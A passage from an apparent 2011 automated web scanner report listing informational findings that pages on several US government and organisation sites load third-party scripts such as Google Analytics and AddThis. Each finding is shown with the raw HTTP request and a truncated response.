The response dynamically includes the following scripts from other domains:

Request

GET /Partners/Default.aspx HTTP/1.1
Host: www.michigan.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Set-Cookie:WEBTRENDS_ID=173.193.214.243-2404771712.30148403; expires=Sun, 29-Apr-2012 12:38:51 GMT; path=/
Connection: close
Date: Sat, 30 Apr 2011 12:38:51 GMT
X-AspNet-Version: 2.0.50727
Set-Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=www.michigan.org&SiteLanguage=1033; path=/
Set-Cookie: EktGUID=71095b1f-aa36-4971-b401-2698abb68934; expires=Mon, 30-Apr-2012 12:38:51 GMT; path=/
Set-Cookie: EkAnalytics=newuser; expires=Mon, 30-Apr-2012 12:38:51 GMT; path=/
Set-Cookie: ASP.NET_SessionId=fiob233tvo1z5sfjfwmwrz55; path=/; HttpOnly
Set-Cookie: tm_city=; path=/
Set-Cookie: tm_int=; path=/
Set-Cookie: lm=sf; path=/
Set-Cookie: mcid=2096; path=/
Set-Cookie: mpid=2096; path=/
Set-Cookie: msid=; path=/
Set-Cookie: mtid=; path=/
Set-Cookie: ck=y; path=/
Set-Cookie: tm_event_dt=; path=/
Set-Cookie: tm_event_end_dt=; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 111219


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<style type="text/css"
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src='http://www.google-analytics.com/ga.js'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script>


<script src="http://www.google.com/coop/cse/brand?form=aspnetForm&lang=en" type="text/javascript"></script>
...[SNIP]...

20.132. http://www.missingkids.com/missingkids/servlet/NewsEventServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.missingkids.com
Path:   /missingkids/servlet/NewsEventServlet

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /missingkids/servlet/NewsEventServlet HTTP/1.1
Host: www.missingkids.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=158082086.1304124080.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=158082086.941977473.1304124080.1304124080.1304124080.1; __utmc=158082086; __utmb=158082086.1.10.1304124080;

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Content-Type: text/html;charset=UTF-8
Content-Length: 18516
Date: Sat, 30 Apr 2011 12:39:21 GMT
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<!-- MKPAGE=ContentMain.jsp -->
<html>
<head>

<title>Missing Children Website</title>


<!-- MKPAGE=MissingkidsStyle.js
...[SNIP]...
<!-- Google Analytics -->

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

20.133. http://www.missingkids.com/missingkids/servlet/PageServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.missingkids.com
Path:   /missingkids/servlet/PageServlet

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /missingkids/servlet/PageServlet?LanguageCountry=en_US&PageId=2936 HTTP/1.1
Host: www.missingkids.com
Proxy-Connection: keep-alive
Referer: http://www.missingkids.com/cybertip/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Content-Type: text/html;charset=UTF-8
Content-Length: 12768
Date: Sat, 30 Apr 2011 00:40:54 GMT
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<!-- MKPAGE=ContentMain.jsp -->
<html>
<head>

<title>CyberTipline - Report Child Pornography</title>


<!-- MKPAGE=Miss
...[SNIP]...
<!-- Google Analytics -->

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

20.134. http://www.missingkids.com/missingkids/servlet/PubCaseSearchServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.missingkids.com
Path:   /missingkids/servlet/PubCaseSearchServlet

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /missingkids/servlet/PubCaseSearchServlet HTTP/1.1
Host: www.missingkids.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=158082086.1304124080.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=158082086.941977473.1304124080.1304124080.1304124080.1; __utmc=158082086; __utmb=158082086.1.10.1304124080;

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Content-Type: text/html;charset=UTF-8
Content-Length: 61046
Date: Sat, 30 Apr 2011 12:39:22 GMT
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<!-- MKPAGE=ContentMain.jsp -->
<html>
<head>

<title>National Center for Missing & Exploited Children</title>


<!-- MK
...[SNIP]...
<!-- Google Analytics -->

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

20.135. http://www.missingkids.com/missingkids/servlet/PublicHomeServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.missingkids.com
Path:   /missingkids/servlet/PublicHomeServlet

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /missingkids/servlet/PublicHomeServlet HTTP/1.1
Host: www.missingkids.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=158082086.1304124080.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=158082086.941977473.1304124080.1304124080.1304124080.1; __utmc=158082086; __utmb=158082086.1.10.1304124080;

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Content-Type: text/html;charset=UTF-8
Content-Length: 36406
Date: Sat, 30 Apr 2011 12:39:23 GMT
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<!-- MKPAGE=ContentMain.jsp -->
<html>
<head>

<title>National Center for Missing & Exploited Children</title>


<!-- MK
...[SNIP]...
<!-- Google Analytics -->

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

20.136. http://www.missingkids.com/missingkids/servlet/StayInformedServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.missingkids.com
Path:   /missingkids/servlet/StayInformedServlet

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /missingkids/servlet/StayInformedServlet HTTP/1.1
Host: www.missingkids.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=158082086.1304124080.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=158082086.941977473.1304124080.1304124080.1304124080.1; __utmc=158082086; __utmb=158082086.1.10.1304124080;

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Content-Type: text/html;charset=UTF-8
Content-Length: 18516
Date: Sat, 30 Apr 2011 12:39:23 GMT
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<!-- MKPAGE=ContentMain.jsp -->
<html>
<head>

<title>Missing Children Website</title>


<!-- MKPAGE=MissingkidsStyle.js
...[SNIP]...
<!-- Google Analytics -->

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

20.137. http://www.mo.gov/my-government/transparency-accountability/meetings/details.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mo.gov
Path:   /my-government/transparency-accountability/meetings/details.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /my-government/transparency-accountability/meetings/details.php HTTP/1.1
Host: www.mo.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gs_p_GSN-237422-W=1664119246; __utmz=59250609.1304162038.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gs_u=1496610374:2567:5000:1304162085744; __utma=59250609.68601831.1304162038.1304162038.1304162038.1; __utmc=59250609; __utmb=59250609.1.10.1304162038;

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:39:23 GMT
Server: Apache
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 21000

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
</script>
<script type="text/javascript" src="http://maps.google.com/maps/api/js?sensor=true"></script>
...[SNIP]...

20.138. http://www.molottery.com/winningNumbers.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.molottery.com
Path:   /winningNumbers.do

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /winningNumbers.do HTTP/1.1
Host: www.molottery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:37:25 GMT
Server: Apache/2.0
Set-Cookie: lottery-track=173.193.214.243.1304167045882473; path=/; expires=Sun, 29-Apr-12 12:37:25 GMT; domain=.molottery.com
Set-Cookie: JSESSIONID=B68A0D1FE6158E2B37564B1E5B08F479.tomcat2; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 10954

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<html>
<head>
<link href="/c
...[SNIP]...
</div>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

20.139. http://www.money-rates.com/news/10-best-states-for-making-a-living.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.money-rates.com
Path:   /news/10-best-states-for-making-a-living.htm

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/10-best-states-for-making-a-living.htm HTTP/1.1
Host: www.money-rates.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Cache-Control: public
Cache-Control: public
Content-Type: text/html; charset=UTF-8
Date: Sat, 30 Apr 2011 12:39:31 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PHPSESSID=o84oc0t53fauuilmk9f0e2ouc2; path=/
Content-Length: 40372

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

   <meta name="WT.qs_dlk" content="F
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&amp;lang=en">
</script>
...[SNIP]...
<div class="ShareList">
   <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=xa-4d35deb85d917471">
</script>
...[SNIP]...
</form>
   <script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box-btm&amp;lang=en">
</script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://e1.cdn.qnsr.com/jsc/e1/fl.js">

</script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://e1.cdn.qnsr.com/jsc/e1/fl.js">

</script>
...[SNIP]...

20.140. http://www.myflorida.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.myflorida.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.myflorida.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:35:58 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a DAV/2 Phusion_Passenger/3.0.0 PHP/5.3.3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 63918

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head><meta name="external_links" content="true" />
<title>MyFlorida.com - Home</title>

<meta content="text/html; charset=utf-8"
...[SNIP]...
</script>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
</form>
<script src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en" type="text/javascript"></script>
...[SNIP]...

20.141. http://www.nh.gov/maps/traffic/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nh.gov
Path:   /maps/traffic/index.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /maps/traffic/index.html HTTP/1.1
Host: www.nh.gov
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 29 Apr 2011 22:36:52 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 13042
Connection: close
Content-Type: text/html; charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:v="urn:schemas-microsoft-co
...[SNIP]...
<head>

<script src="http://maps.google.com/maps?file=api&amp;v=2.x&amp;key=ABQIAAAAbhQp-VObmhtKC3jw2mDsWBSCpjFWZZb2DqQfC5BHuO8gxXzfBxTX9m_5t-HlG5IwuX165EpPmduGng" type="text/javascript"></script>
...[SNIP]...

20.142. http://www.nhfishandgame.com/cgi-bin/gl/outdoor.cgi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nhfishandgame.com
Path:   /cgi-bin/gl/outdoor.cgi

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /cgi-bin/gl/outdoor.cgi HTTP/1.1
Host: www.nhfishandgame.com
Proxy-Connection: keep-alive
Referer: http://www.nhfishandgame.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 29 Apr 2011 22:42:50 GMT
Server: OutdoorCentralServer
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 20055


<html>
<head>
<title>GreatLodge.com :: Outdoor Central :: Active Outdoors</title>

<style type=text/css>
.button {font-weight:bold; color:#ffffff; background-color:#006600; border:#000000; border-
...[SNIP]...
</style>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

20.143. http://www.nist.gov/srd/onlinelist.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nist.gov
Path:   /srd/onlinelist.htm

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /srd/onlinelist.htm HTTP/1.1
Host: www.nist.gov
Proxy-Connection: keep-alive
Referer: http://data.osbm.state.nc.us/pls/pbis/dyn_osbmweb_libdatalinks.show?p_arg_names=context&p_arg_values=facts
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:00:05 GMT
Server: Apache
NIST: g3
Content-Type: text/html; charset=UTF-8
Content-Length: 13113

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<!-- Con
...[SNIP]...
</title>
<script language="JavaScript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script>
...[SNIP]...

20.144. https://www.nrsservicecenter.com/iApp/ret/cmd/RetLogin  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.nrsservicecenter.com
Path:   /iApp/ret/cmd/RetLogin

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /iApp/ret/cmd/RetLogin HTTP/1.1
Host: www.nrsservicecenter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: MyNRSCookie=724442563878733568483573357039674368684f2f516152454779736c49786e796d542f666d69513965457877376c44447057662f5a6d554b2b4c4f694e797868486e4b6e4c4f4a566c303d; JSESSIONID=0001ZvssK2nhmoK-lfaLP856fhM:13j9iupo2; WT_FPC=id=20b3a41e6b6b11701271304126947907:lv=1304126947907:ss=1304126947907; TLTHID=31A358A072C91072200781E018D630EF; MyNRSSite=Ohio457; TLTSID=2B79DD6E72C9107208B8A4861F3DF71F;

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:39:42 GMT
Server: IBM_HTTP_Server/6.1.0.27-PK91361 Apache/2.0.47 (Unix)
Set-Cookie: TLTHID=EBB9219073261073022FCEC122287B10; Path=/; Domain=.nrsservicecenter.com
Set-Cookie: JSESSIONID=0001ACicLnN7eR8w5L7FAtdHBJX:13j9iupo2; Path=/
Set-Cookie: MyNRSCookie=724442563878733568483573357039674368684f2f666e524b777875572f7a39336c3047694975555635386d576950674d6554344c5953444d442b4a352b6549; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: private, no-cache=set-cookie
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 7645


<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


   <html lang
...[SNIP]...
</form>
<script type="text/javascript" src="//www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...

20.145. https://www.nrsservicecenter.com/iApp/ret/content/landing.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.nrsservicecenter.com
Path:   /iApp/ret/content/landing.do

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /iApp/ret/content/landing.do?Role=None&Site=Ohio457 HTTP/1.1
Host: www.nrsservicecenter.com
Connection: keep-alive
Referer: http://oh.gov/stateemployee/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:38:13 GMT
Server: IBM_HTTP_Server/6.1.0.27-PK91361 Apache/2.0.47 (Unix)
Set-Cookie: TLTHID=832510E672CA10722944D51D41D1E762; Path=/; Domain=.nrsservicecenter.com
Set-Cookie: TLTSID=832510E672CA10722944D51D41D1E762; Path=/; Domain=.nrsservicecenter.com
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0001PF1_bP7-IBZ42tEJzNaNTGe:13j9iuj6t; Path=/
Set-Cookie: MyNRSCookie=724442563878733568483444304d6f4450416e34524c754261686f56624c74417a4e4d3251564d3742725258754d5173714a5651334c7449472f736b684a63426642327971723849794f733d; Path=/
Set-Cookie: MyNRSSite=Ohio457; Expires=Tue, 27 Apr 2021 01:38:12 GMT; Path=/
Set-Cookie: MyNRSCookie=724442563878733568483573357039674368684f2f516152454779736c49786e796d542f666d69513965457877376c44447057662f5a6d554b2b4c4f694e797868486e4b6e4c4f4a566c303d; Path=/
Set-Cookie: MyNRSSite=Ohio457; Expires=Tue, 27 Apr 2021 01:38:12 GMT; Path=/
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 10263


<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html lang="en" x
...[SNIP]...
</form>
<script type="text/javascript" src="//www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...

20.146. https://www.nrsservicecenter.com/iApp/ret/landing.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.nrsservicecenter.com
Path:   /iApp/ret/landing.do

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /iApp/ret/landing.do HTTP/1.1
Host: www.nrsservicecenter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: MyNRSCookie=724442563878733568483573357039674368684f2f516152454779736c49786e796d542f666d69513965457877376c44447057662f5a6d554b2b4c4f694e797868486e4b6e4c4f4a566c303d; JSESSIONID=0001ZvssK2nhmoK-lfaLP856fhM:13j9iupo2; WT_FPC=id=20b3a41e6b6b11701271304126947907:lv=1304126947907:ss=1304126947907; TLTHID=31A358A072C91072200781E018D630EF; MyNRSSite=Ohio457; TLTSID=2B79DD6E72C9107208B8A4861F3DF71F;

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:39:45 GMT
Server: IBM_HTTP_Server/6.1.0.27-PK91361 Apache/2.0.47 (Unix)
Set-Cookie: TLTHID=EDEE6218732610730181C1E2C63083C9; Path=/; Domain=.nrsservicecenter.com
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0001mmfBFC8Kymw5lCom8cv4BX4:13j9iupo2; Path=/
Set-Cookie: MyNRSCookie=724442563878733568483573357039674368684f2f516152454779736c49786e796d542f666d69513965457877376c44447057662f5a6d554b2b4c4f694e797868486e4b6e4c4f4a566c303d; Path=/
Set-Cookie: MyNRSSite=Ohio457; Expires=Tue, 27 Apr 2021 12:40:59 GMT; Path=/
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 10263


<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html lang="en" x
...[SNIP]...
</form>
<script type="text/javascript" src="//www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...

20.147. https://www.nrsservicecenter.com/iApp/ret/showPage.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.nrsservicecenter.com
Path:   /iApp/ret/showPage.do

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /iApp/ret/showPage.do HTTP/1.1
Host: www.nrsservicecenter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: MyNRSCookie=724442563878733568483573357039674368684f2f516152454779736c49786e796d542f666d69513965457877376c44447057662f5a6d554b2b4c4f694e797868486e4b6e4c4f4a566c303d; JSESSIONID=0001ZvssK2nhmoK-lfaLP856fhM:13j9iupo2; WT_FPC=id=20b3a41e6b6b11701271304126947907:lv=1304126947907:ss=1304126947907; TLTHID=31A358A072C91072200781E018D630EF; MyNRSSite=Ohio457; TLTSID=2B79DD6E72C9107208B8A4861F3DF71F;

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:39:45 GMT
Server: IBM_HTTP_Server/6.1.0.27-PK91361 Apache/2.0.47 (Unix)
Set-Cookie: TLTHID=EDD8FB4E7326107300A08C7B1CB4C778; Path=/; Domain=.nrsservicecenter.com
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0001YFkAdRMz04gilI2jygmcFCj:13j9iupo2; Path=/
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 8439


        <?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xh
...[SNIP]...
</form>
<script type="text/javascript" src="//www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...

20.148. http://www.nysenate.gov/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nysenate.gov
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.nysenate.gov
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=utf-8
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1304117322"
Cache-Control: public, max-age=300
Last-Modified: Fri, 29 Apr 2011 22:48:42 GMT
X-AH-Environment: prod
Cache-Control: s-maxage=10
Date: Fri, 29 Apr 2011 22:50:25 GMT
X-Varnish: 2294175891 2294164464
Age: 101
Via: 1.1 varnish
Connection: keep-alive
X-Cache: HIT
X-Cache-Hits: 2
Content-Length: 65985

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<met
...[SNIP]...
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<script src="http://assets.percentmobile.com/percent_mobile.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
<div id="conditional-livestream"><script 